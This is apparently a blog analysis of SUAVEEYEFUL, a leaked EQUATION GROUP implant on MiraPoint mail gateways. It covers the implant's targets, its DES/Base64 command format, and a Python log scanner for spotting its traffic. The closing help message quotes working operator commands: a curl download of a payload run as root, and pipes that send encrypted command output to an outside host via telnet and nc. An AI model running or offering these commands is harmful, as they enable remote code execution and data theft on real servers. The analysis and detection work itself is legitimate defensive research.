I was checking the 2017 ShadowBrokers leaks when I noticed that one of the EQUATION GROUP tools leaked back then has no public references/analysis (at least as far as I can tell). So, here is what this software implant does and how it works. This was in a directory titled suaveeyeful_i386-unknown-mirapoint3.4.3 and it reveals lots of interesting details. In summary:
The Leaked Files
In that directory there are a few different files. Those are:
The utilities (bdes, decode-base64 and uriescape) were bundled along with SUAVEEYEFUL because it uses them internally. This ensured that the software implant would not rely on any external dependencies (other than the core system utilities that were present by default at the time, such as ls, cat, telnet, etc.).
Targets
The se.old client was potentially the one the operators were adapting for their new target. That is due to inconsistencies in its content which make it look like a draft/edited version of an old operation. A leftover comment identifies the mail.mfa.gov.cn (202.99.26.6) as its configured SUAVEEYEFUL target.
This was the email gateway of the Chinese Ministry of Foreign Affairs (MFA). Even today, this IP address (202.99.26.6) still points to an email server of China’s MFA. It’s hard to determine when the EQUATION GROUP compromised this email server using the SUAVEEYEFUL software implant. Based entirely on the build times, we can assess that it was at least since the early 2000s.
Most of the files included in the leaked directory were designed for another target: the email gateways of Waseda Research University, which according to its official website, “strives to conduct cutting-edge research that solves world problems and contributes to the greater good of society. Unorthodox thinking and intellectual curiosity are what drive research at Waseda.”
The se client had two compromised Waseda email gateways configured, and both accessed via their internal IP addresses from another compromised host, referenced only by its IP address. So, at least 3 systems in Waseda’s infrastructure were compromised by the EQUATION GROUP since at least 2003.
The top host (mp450) was the university’s MiraPoint 450 (later renamed to RazorGate 450), an email security appliance. And the other host (mg1.waseda.ac.jp) was the MiraPoint email gateway. The third host is still unknown, but based on its IP range (similar to that of mp450) we can deduce that it was likely a system located in the university’s DMZ network segment.
Installation of SUAVEEYEFUL in Waseda’s MiraPoint Servers
This is clearly described in the opscript.se file which we can assume that it was one of the first operational tasks that the EQUATION GROUP operators executed to install the SUAVEEYEFUL software implant. Here is that process:
The SUAVEEYEFUL Software Implant
SUAVEEYEFUL (or SE) has two components, a client and a server. The server component is a very simple CGI program written in C for FreeBSD that reads its input from its help endpoint. Any commands received would be executed (with root privileges, as shown in the previous section) using the system() library call, as long as they match the defined format (described later in this post).
The client side ensures that all requests are properly formatted, encoded (using Base64) and encrypted (with DES). The client supported 4 options:
As we can see from this, for the generation of the cryptographic material, EQUATION GROUP was using the system’s /dev/random in the following way:
head -c 8 /dev/random | hexdump -e '/8 "0x%016x\n"'
The command was then structured with # being used as a separator. The main command to be executed was constructed with this:
echo "`head -c 8 /dev/random | hexdump -e '/8 "%016x\n"'`#`date +"%s"`#$cmd"|bdes -k $key > out
This results in a format that looks like this:
This structure was then encrypted using the hardcoded DES key and passed through the uriescape tool to ensure that the receiving MiraPoint web server would not run into any parsing issues.
Apart from the above, the client also used the date +"%N" command to get the current time in nanoseconds and encrypted it with a key of that same value. This was an anti-analysis/anti-detection trick, since it would be hard for anyone to get the SE software implant to execute any command without knowing about this non-intuitive addition to its expected input.
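From a defender's side, the traffic shape described above (a URI-escaped, Base64-encoded, DES-encrypted blob sent to the MiraPoint help CGI) is what a web-server log review can key on. The following is an added example written for this post, not code from the leak or from the original analysis; it assumes the client delivered the payload in the query string of a GET request and uses constructed Apache-style log lines.

```python
import base64
import binascii
import re
import urllib.parse

# Endpoint the SUAVEEYEFUL client talks to (path taken from the leaked help message).
HELP_ENDPOINT = "/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help"
# Minimal common-log-format matcher: client IP, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

def looks_like_bdes_base64(blob: str) -> bool:
    """True if blob is valid Base64 whose decoded length is a non-zero multiple of 8 bytes.
    bdes emits whole DES blocks, so the implant's payload always decodes to an 8-byte-aligned blob."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return False
    return len(raw) > 0 and len(raw) % 8 == 0

def inspect_line(line: str):
    """Return (client_ip, suspect_blob) when a request to the help CGI carries a DES-sized
    Base64 blob, else None. Ordinary help browsing carries short keyword parameters at most."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if not path.endswith(HELP_ENDPOINT) or not query:
        return None
    for part in urllib.parse.unquote(query).split("&"):   # undo the uriescape step
        # Check both a bare blob and the value of a "key=blob" pair.
        for candidate in (part, part.partition("=")[2]):
            if len(candidate) >= 24 and looks_like_bdes_base64(candidate):
                return (m.group("ip"), candidate)
    return None

def scan(lines):
    """Run inspect_line over a log and keep the hits."""
    return [hit for hit in map(inspect_line, lines) if hit]

# Constructed sample log (assumption: GET with the blob in the query string). Line 1 carries a
# URI-escaped Base64 blob that decodes to 32 bytes (four DES blocks); line 2 is benign use of the
# same CGI; line 3 is unrelated traffic. IPs are documentation addresses, not from the leak.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2003:10:00:01 +0900] "GET ' + HELP_ENDPOINT +
    '?YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU%3D HTTP/1.0" 200 512',
    '192.0.2.77 - - [10/Oct/2003:10:00:05 +0900] "GET ' + HELP_ENDPOINT + '?topic=quota HTTP/1.0" 200 2048',
    '192.0.2.77 - - [10/Oct/2003:10:00:09 +0900] "GET /index.html HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for ip, blob in scan(SAMPLE_LOG):
        print(f"suspect SE request from {ip}: {blob[:16]}...")
```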
Lastly, the SE help message displayed three instructions on example commands that the operator could use. The three help commands were performing the following tasks:
Here is the full help message:
1) se -c"(mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/curl http://10.1.2.150:5555/sendmail -osendmail;chmod +x sendmail;D=-c10.1.2.150:9999 PATH=. /usr/bin/asroot sendmail;rm -f sendmail) > /dev/null 2>&1" -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help"
2) se -c"(w; ls -l; ls -l /tmp) | bdes -k SECRET | mmencode | telnet 10.1.2.150 4444" -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help"
with nc -l -p 4444 | decode-base64 | bdes -d -k SECRET
Use this to generate a random key and replace SECRET with the key
head -c 8 /dev/random | hexdump -e '/8 "0x%016x\n"'
3) se -c"(w; ls -l; ls -l /tmp) | telnet 10.1.2.150 4444" -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help"
with nc -l -p 4444
WARNING
WARNING
DO NOT -burn!!!
Use -exit